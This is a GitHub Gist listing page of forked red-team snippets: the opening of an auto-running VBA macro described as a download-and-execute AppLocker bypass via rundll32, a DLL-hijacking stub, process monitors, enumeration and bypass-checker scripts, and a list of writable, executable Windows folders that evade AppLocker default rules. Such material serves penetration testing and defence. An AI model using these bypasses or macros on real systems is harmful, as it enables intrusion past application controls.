nani1337
nani1337
/ macro_download_and_execute_rundll32_powershdll_powershell.vba
Created
December 21, 2022 00:36
— forked from egre55/macro_download_and_execute_rundll32_powershdll_powershell.vba
macro - download and execute applocker bypass (rundll32 / powershdll / powershell)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' based on | |
| ' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer | |
| ' | |
| ' PowerShdll.dll by @p3nt4 | |
| ' https://github.com/p3nt4/PowerShdll | |
| ' | |
| ' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click | |
| ' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case) | |
| Sub Document_Open() |
nani1337
/ calc.c
Created
December 21, 2022 00:36
— forked from egre55/calc.c
calc.c (calc.dll) by Holly Graceful @HollyGraceful
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| cl.exe /LD calc.c | |
| rundll32 shell32.dll,Control_RunDLL C:\Users\%username%\Desktop\calc.dll | |
| calc.c by @HollyGraceful | |
| https://www.gracefulsecurity.com/privesc-dll-hijacking/ | |
| */ | |
| #include <windows.h> | |
| int fireLazor() | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Ugly file-based process monitor script. Non-PowerShell in case blocked | |
| @echo off | |
| :loop | |
| del file1.txt 2> nul | |
| del file2.txt 2> nul | |
| for /f "usebackq skip=1 tokens=* delims= " %%i in (`wmic path win32_process get commandline ^| findstr /r /v "[^\ ]"`) do echo %%i >> file1.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simple PowerShell process monitor | |
| while($true) | |
| { | |
| $process = Get-WmiObject Win32_Process | Select-Object CommandLine | |
| Start-Sleep 1 | |
| $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine | |
| Compare-Object -ReferenceObject $process -DifferenceObject $process2 |
nani1337
/ find_writable_locations.bat
Created
December 21, 2022 00:35
— forked from egre55/find_writable_locations.bat
find_writable_locations.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Script to find writable locations under C:\ | |
| C: | |
| cd C:\TEMP\ | |
| echo Creating list of all directories and sub-directories | |
| dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt |
nani1337
/ Get-SituationalAwareness.ps1
Created
December 21, 2022 00:35
— forked from egre55/Get-SituationalAwareness.ps1
Get-SituationalAwareness.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Script will enumerate: | |
| PowerShell Language Mode | |
| Current user details | |
| Current privileges | |
| Domain and Forest functional levels | |
| AD user information | |
| AD computer information |
nani1337
/ Get-SituationalAwareness.ps1
Created
December 21, 2022 00:35
— forked from egre55/Get-SituationalAwareness.ps1
Get-SituationalAwareness.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Script will enumerate: | |
| PowerShell Language Mode | |
| Current user details | |
| Current privileges | |
| Domain and Forest functional levels | |
| AD user information | |
| AD computer information |
nani1337
/ applocker_bypass_checker.bat
Created
December 21, 2022 00:35
— forked from egre55/applocker_bypass_checker.bat
applocker bypass checker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Influenced by the Powershell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folder that are both writable | |
| REM and executable under C:\Windows (whitelisted by AppLocker default rules). | |
| REM | |
| REM However, environments implementing application whitelisting may also block powershell.exe. | |
| REM | |
| REM This intends to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\. Replace puttygen.exe as appropriate. Run as a | |
| REM standard (non-admin) user ;D. Bypasses listed in bypasses.txt |
nani1337
/ applocker_default_rules_bypass_writable_executable_windows_folders.txt
Created
December 21, 2022 00:35
— forked from egre55/applocker_default_rules_bypass_writable_executable_windows_folders.txt
applocker_default_rules_bypass_writable_executable_windows_folders.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # writable and executable Windows folders with AppLocker Default Rules in effect | |
| Windows Server 2019 (Version 10.0.17763.914) | |
| C:\Windows\Tasks | |
| C:\Windows\tracing | |
| C:\Windows\Registration\CRMLog | |
| C:\Windows\System32\spool\drivers\color |
nani1337
/ powershell_binaries_assemblies.txt
Created
December 21, 2022 00:34
— forked from egre55/powershell_binaries_assemblies.txt
powershell binaries & assemblies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| C:\>dir /B /S powershell.exe /S system.management.automation.dll | |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | |
| C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_968a6a2f18e547eb\powershell.exe | |
| C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_1.0.0.0_none_6340379543bd8a03\System.Management.Automation.dll | |
| C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_10.0.14393.0_none_f2bad6783ea6eb6a\System.Management.Automation.dll | |
| C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_a0df14814d4609e6\powershell.exe |
NewerOlder